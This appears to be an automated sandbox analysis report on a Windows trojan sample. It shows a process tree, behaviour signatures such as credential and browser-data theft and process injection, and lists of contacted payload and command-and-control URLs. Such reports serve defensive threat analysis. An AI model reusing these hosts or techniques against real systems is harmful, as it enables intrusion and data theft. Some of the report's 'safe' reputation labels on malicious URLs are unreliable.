14 4 21->27         started        31 systray.exe 13 21->31         started        33 Lvdnyvcvr.exe 21->33         started        signatures12 process13 dnsIp14 63 a.uguu.se 27->63 87 Multi AV Scanner detection for dropped file 27->87 89 Machine Learning detection for dropped file 27->89 91 Encrypted powershell cmdline option found 27->91 35 powershell.exe 27->35         started        37 Lvdnyvcvr.exe 27->37         started        93 Tries to steal Mail credentials (via file / registry access) 31->93 95 Tries to harvest and steal browser information (history, passwords, etc) 31->95 97 Modifies the context of a thread in another process (thread injection) 31->97 99 Maps a DLL or memory area into another process 31->99 65 192.168.2.1 unknown unknown 33->65 67 a.uguu.se 33->67 101 Injects a PE file into a foreign processes 33->101 39 powershell.exe 33->39         started        41 Lvdnyvcvr.exe 33->41         started        signatures15 process16 process17 43 conhost.exe 35->43         started        45 conhost.exe 39->45         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SC_0017384.exe13%ReversingLabsWin32.Trojan.Woreflint
          SC_0017384.exe18%VirustotalBrowse
          SC_0017384.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe13%ReversingLabsWin32.Trojan.Woreflint

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.SC_0017384.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.madisoncountylincoln.com0%VirustotalBrowse
          brunaeleandro.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://james.newtonking.com/projects/json0%URL Reputationsafe
          https://a.uguu.se4Dp0%Avira URL Cloudsafe
          http://www.funhood.lifewww.funhood.life0%Avira URL Cloudsafe
          http://www.rw-bau.com/t4np/0%Avira URL Cloudsafe
          http://www.madisoncountylincoln.com0%Avira URL Cloudsafe
          http://www.emprendizajesocial.com/t4np/0%Avira URL Cloudsafe
          http://www.evelycosmetique.comwww.evelycosmetique.com0%Avira URL Cloudsafe
          http://www.brunaeleandro.comwww.brunaeleandro.com0%Avira URL Cloudsafe
          http://www.metatv.app0%Avira URL Cloudsafe
          http://www.groupekoriolis.com0%Avira URL Cloudsafe
          http://www.myprojoints.comwww.myprojoints.com0%Avira URL Cloudsafe
          http://www.groupekoriolis.com/t4np/0%Avira URL Cloudsafe
          http://www.33347.netwww.33347.net0%Avira URL Cloudsafe
          http://www.madisoncountylincoln.com/0%Avira URL Cloudsafe
          http://www.mejawajib.shop0%Avira URL Cloudsafe
          https://www.casar.com/assunto/casamentos/decoracao-de-casamento/0%Avira URL Cloudsafe
          https://www.casar.com/assunto/lua-de-mel-2/0%Avira URL Cloudsafe
          https://www.casar.com0%Avira URL Cloudsafe
          https://www.casar.com/assunto/organizacao/0%Avira URL Cloudsafe
          http://www.funhood.life0%Avira URL Cloudsafe
          http://www.brunaeleandro.com0%Avira URL Cloudsafe
          http://www.findmyoriginstory.comwww.findmyoriginstory.com0%Avira URL Cloudsafe
          http://www.mnsmanagmentsolutions.com0%Avira URL Cloudsafe
          http://www.findmyoriginstory.com0%Avira URL Cloudsafe
          http://www.sistemadanetflix.site/t4np/0%Avira URL Cloudsafe
          http://www.sistemadanetflix.sitewww.sistemadanetflix.site0%Avira URL Cloudsafe
          http://www.babupaul.comwww.babupaul.com0%Avira URL Cloudsafe
          https://www.casar.com/assunto/noivas/dicas-para-noivas/0%Avira URL Cloudsafe
          http://www.evelycosmetique.com0%Avira URL Cloudsafe
          http://www.icste-conference.org0%Avira URL Cloudsafe
          http://www.33347.net0%Avira URL Cloudsafe
          http://www.rw-bau.comwww.rw-bau.com0%Avira URL Cloudsafe
          http://www.mejawajib.shopwww.mejawajib.shop0%Avira URL Cloudsafe
          http://www.myprojoints.com0%Avira URL Cloudsafe
          http://www.babupaul.com/t4np/0%Avira URL Cloudsafe
          http://www.metatv.app/t4np/0%Avira URL Cloudsafe
          http://www.madisoncountylincoln.com/t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA==0%Avira URL Cloudsafe
          http://www.metatv.app/t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG450%Avira URL Cloudsafe
          http://www.madisoncountylincoln.com/t4np/0%Avira URL Cloudsafe
          https://www.casar.com/assunto/casamentos/casamentos-reais/0%Avira URL Cloudsafe
          http://www.funhood.life/t4np/0%Avira URL Cloudsafe
          http://www.emprendizajesocial.com/t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g==0%Avira URL Cloudsafe
          http://www.sistemadanetflix.site0%Avira URL Cloudsafe
          https://www.casar.com/assunto/cha-de-panela/0%Avira URL Cloudsafe
          http://www.findmyoriginstory.com/t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw==0%Avira URL Cloudsafe
          https://www.casar.com/assunto/noivas/vestidos-de-noiva/0%Avira URL Cloudsafe
          http://www.brunaeleandro.com/t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG450%Avira URL Cloudsafe
          http://www.findmyoriginstory.com/t4np/0%Avira URL Cloudsafe
          https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137c0%Avira URL Cloudsafe
          http://www.mejawajib.shop/t4np/0%Avira URL Cloudsafe
          http://www.rw-bau.com0%Avira URL Cloudsafe
          http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.com0%Avira URL Cloudsafe
          http://www.madisoncountylincoln.comwww.madisoncountylincoln.com0%Avira URL Cloudsafe
          http://www.icste-conference.org/t4np/0%Avira URL Cloudsafe
          http://www.babupaul.com0%Avira URL Cloudsafe
          http://www.icste-conference.orgwww.icste-conference.org0%Avira URL Cloudsafe
          http://www.mnsmanagmentsolutions.com/t4np/0%Avira URL Cloudsafe
          http://www.groupekoriolis.comwww.groupekoriolis.com0%Avira URL Cloudsafe
          http://www.myprojoints.com/t4np/0%Avira URL Cloudsafe
          https://urn.to/r/sds_see5bad0%Avira URL Cloudsafe
          http://www.emprendizajesocial.com0%Avira URL Cloudsafe
          http://www.emprendizajesocial.comwww.emprendizajesocial.com0%Avira URL Cloudsafe
          http://www.metatv.appwww.metatv.app0%Avira URL Cloudsafe
          https://ajuda.casar.com0%Avira URL Cloudsafe
          http://www.33347.net/t4np/0%Avira URL Cloudsafe
          http://www.brunaeleandro.com/t4np/0%Avira URL Cloudsafe
          http://www.evelycosmetique.com/t4np/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.madisoncountylincoln.com
          		172.67.152.24
          		truetrueunknown
          a.uguu.se
          		188.40.83.211
          		truefalse
            		high
            www.funhood.life
            		162.213.249.254
            		truefalse
              		unknown
              brunaeleandro.com
              		54.85.86.211
              		truetrueunknown
              www.emprendizajesocial.com
              		217.160.0.229
              		truetrue
                		unknown
                www.metatv.app
                		172.67.194.225
                		truetrue
                  		unknown
                  www.findmyoriginstory.com
                  		74.208.236.131
                  		truetrue
                    		unknown
                    www.brunaeleandro.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.myprojoints.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.emprendizajesocial.com/t4np/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.metatv.app/t4np/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.madisoncountylincoln.com/t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA==true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.metatv.app/t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.madisoncountylincoln.com/t4np/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.emprendizajesocial.com/t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g==true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.findmyoriginstory.com/t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw==true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.brunaeleandro.com/t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45true
                        • Avira URL Cloud: safe
                        		unknown
                        https://a.uguu.se/fwvfviJb.datfalse
                          		high
                          http://www.brunaeleandro.com/t4np/true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabM61Ae5o9b.8.drfalse
                            		high
                            https://duckduckgo.com/ac/?q=M61Ae5o9b.8.drfalse
                              		high
                              http://www.rw-bau.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.madisoncountylincoln.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.casar.com/assunto/organizacao/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.metatv.appexplorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://a.uguu.se4DpSC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.brunaeleandro.comwww.brunaeleandro.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.funhood.lifewww.funhood.lifeexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.casar.com/assunto/casamentos/decoracao-de-casamento/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.evelycosmetique.comwww.evelycosmetique.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://search.yahoo.com?fr=crmas_sfpfM61Ae5o9b.8.drfalse
                                		high
                                https://www.newtonsoft.com/jsonLvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.myprojoints.comwww.myprojoints.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.groupekoriolis.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.casar.com/assunto/lua-de-mel-2/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.33347.netwww.33347.netexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.groupekoriolis.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.mejawajib.shopexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.casar.comexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.madisoncountylincoln.com/explorer.exe, 00000004.00000002.594853816.00000000160EE000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005E0E000.00000004.10000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.brunaeleandro.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.findmyoriginstory.comwww.findmyoriginstory.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.funhood.lifeexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://embed.typeform.com/embed.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.findmyoriginstory.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.mnsmanagmentsolutions.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sistemadanetflix.site/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.evelycosmetique.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://connect.facebook.net/en_US/fbevents.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.casar.com/assunto/noivas/dicas-para-noivas/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://a.uguu.se/fwvfviJb.dat=SC_0017384.exe, Lvdnyvcvr.exe.0.drfalse
                                        		high
                                        http://www.babupaul.comwww.babupaul.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sistemadanetflix.sitewww.sistemadanetflix.siteexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.pinterest.com/casarpontocomexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.mejawajib.shopwww.mejawajib.shopexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.myprojoints.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000003.533668803.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.592015514.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.icste-conference.orgexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.33347.netexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.rw-bau.comwww.rw-bau.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoM61Ae5o9b.8.drfalse
                                                		high
                                                http://www.babupaul.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.casar.com/assunto/casamentos/casamentos-reais/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.youtube.com/casarpontocomexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=M61Ae5o9b.8.drfalse
                                                    		high
                                                    http://www.funhood.life/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchM61Ae5o9b.8.drfalse
                                                      		high
                                                      https://www.casar.com/assunto/cha-de-panela/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sistemadanetflix.siteexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=M61Ae5o9b.8.drfalse
                                                            		high
                                                            http://james.newtonking.com/projects/jsonLvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.casar.com/assunto/noivas/vestidos-de-noiva/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.findmyoriginstory.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ac.ecosia.org/autocomplete?q=M61Ae5o9b.8.drfalse
                                                              		high
                                                              https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137cexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://plus.google.com/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://search.yahoo.com?fr=crmas_sfpM61Ae5o9b.8.drfalse
                                                                  		high
                                                                  http://www.mejawajib.shop/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.madisoncountylincoln.comwww.madisoncountylincoln.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.rw-bau.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.icste-conference.org/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.icste-conference.orgwww.icste-conference.orgexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.babupaul.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.groupekoriolis.comwww.groupekoriolis.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.newtonsoft.com/jsonschemaLvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.mnsmanagmentsolutions.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.myprojoints.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.emprendizajesocial.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.emprendizajesocial.comwww.emprendizajesocial.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://urn.to/r/sds_see5badSC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.nuget.org/packages/Newtonsoft.Json.BsonSC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.metatv.appwww.metatv.appexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
